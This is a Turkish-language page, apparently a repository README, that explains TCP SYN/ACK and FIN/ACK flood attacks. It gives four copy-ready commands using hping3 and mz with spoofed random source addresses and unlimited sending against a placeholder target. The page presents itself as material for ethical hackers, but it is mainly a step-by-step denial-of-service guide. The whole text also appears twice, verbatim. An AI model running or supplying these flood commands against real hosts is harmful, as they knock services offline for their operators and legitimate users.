TCP SYN/ACK, FIN/ACK DDoS
TCP SYN/ACK, FIN/ACK DDoS Saldırıları, hedef sistemin (aradaki sistemlerin) servis dışı bırakılması için TCP protokolünün zayıf noktalarını kullanan siber saldırılardır. Bu saldırılarda, saldırganlar hedef sunucuya veya servise çok sayıda sahte TCP paketi göndererek normal TCP trafiğini bozarlar. Bu paketler, sunucunun kaynaklarını tüketir ve gerçek kullanıcıların erişimini engeller.
Bu saldırıları yapmak için kullanılan araçlardan bazıları Hping ve Mz'dir. Hping, TCP/IP protokolünün kontrol bitlerini (SYN, ACK, RST, PSH, FIN, URG) değiştirmek için kullanılan bir ağ test aracıdır. Mz, ağ trafiği oluşturmak ve analiz etmek için kullanılan bir paket oluşturma aracıdır.
Bu araçları kullanarak TCP SYN/ACK, FIN/ACK DDoS Saldırıları yapmak için aşağıdaki adımları izleyebilirsiniz:
1. Adım: Hping ile TCP SYN/ACK flood saldırısı yapmak.
root@bt:~# hping3 -SA hedefsunucu.com -p 80 --rand-source --flood
Bu komut, hedefsunucu.com adresine 80 numaralı porttan rastgele kaynak IP adresleriyle SYN/ACK paketleri gönderir. --flood seçeneği, paketleri mümkün olan en yüksek hızda gönderir.
2. Adım: Hping ile FIN/ACK flood saldırısı yapmak.
root@bt:~# hping3 -FA hedefsunucu.com -p 80 --rand-source --flood
Bu komut, hedefsunucu.com adresine 80 numaralı porttan rastgele kaynak IP adresleriyle FIN/ACK paketleri gönderir. --flood seçeneği, paketleri mümkün olan en yüksek hızda gönderir.
3. Adım: Mz ile SYN/ACK flood saldırısı yapmak.
root@bt:~# mz eth0 -A rand -B hedefsunucu.com -t tcp flags=ack+syn -c 0
Bu komut, eth0 arayüzünden hedefsunucu.com adresine rastgele kaynak IP adresleriyle SYN/ACK paketleri gönderir. -c 0 seçeneği, paketleri sürekli olarak gönderir.
4. Adım: Mz ile FIN/ACK flood saldırısı yapmak.
root@bt:~# mz eth0 -A rand -B hedefsunucu.com -t tcp flags=fin+ack -c 0
Bu komut, eth0 arayüzünden hedefsunucu.com adresine rastgele kaynak IP adresleriyle FIN/ACK paketleri gönderir. -c 0 seçeneği, paketleri sürekli olarak gönderir.
Bu siber güvenlikle ilgili depomdur. Bu depodaki İSSUES kısmıyla çok iyi etik hackerlar olabilirsiniz.
TCP SYN/ACK, FIN/ACK DDoS Saldırıları, hedef sistemin (aradaki sistemlerin) servis dışı bırakılması için TCP protokolünün zayıf noktalarını kullanan siber saldırılardır. Bu saldırılarda, saldırganlar hedef sunucuya veya servise çok sayıda sahte TCP paketi göndererek normal TCP trafiğini bozarlar. Bu paketler, sunucunun kaynaklarını tüketir ve gerçek kullanıcıların erişimini engeller.
Bu saldırıları yapmak için kullanılan araçlardan bazıları Hping ve Mz'dir. Hping, TCP/IP protokolünün kontrol bitlerini (SYN, ACK, RST, PSH, FIN, URG) değiştirmek için kullanılan bir ağ test aracıdır. Mz, ağ trafiği oluşturmak ve analiz etmek için kullanılan bir paket oluşturma aracıdır.
Bu araçları kullanarak TCP SYN/ACK, FIN/ACK DDoS Saldırıları yapmak için aşağıdaki adımları izleyebilirsiniz:
1. Adım: Hping ile TCP SYN/ACK flood saldırısı yapmak.
root@bt:~# hping3 -SA hedefsunucu.com -p 80 --rand-source --flood
Bu komut, hedefsunucu.com adresine 80 numaralı porttan rastgele kaynak IP adresleriyle SYN/ACK paketleri gönderir. --flood seçeneği, paketleri mümkün olan en yüksek hızda gönderir.
2. Adım: Hping ile FIN/ACK flood saldırısı yapmak.
root@bt:~# hping3 -FA hedefsunucu.com -p 80 --rand-source --flood
Bu komut, hedefsunucu.com adresine 80 numaralı porttan rastgele kaynak IP adresleriyle FIN/ACK paketleri gönderir. --flood seçeneği, paketleri mümkün olan en yüksek hızda gönderir.
3. Adım: Mz ile SYN/ACK flood saldırısı yapmak.
root@bt:~# mz eth0 -A rand -B hedefsunucu.com -t tcp flags=ack+syn -c 0
Bu komut, eth0 arayüzünden hedefsunucu.com adresine rastgele kaynak IP adresleriyle SYN/ACK paketleri gönderir. -c 0 seçeneği, paketleri sürekli olarak gönderir.
4. Adım: Mz ile FIN/ACK flood saldırısı yapmak.
root@bt:~# mz eth0 -A rand -B hedefsunucu.com -t tcp flags=fin+ack -c 0
Bu komut, eth0 arayüzünden hedefsunucu.com adresine rastgele kaynak IP adresleriyle FIN/ACK paketleri gönderir. -c 0 seçeneği, paketleri sürekli olarak gönderir.
Bu siber güvenlikle ilgili depomdur. Bu depodaki İSSUES kısmıyla çok iyi etik hackerlar olabilirsiniz.
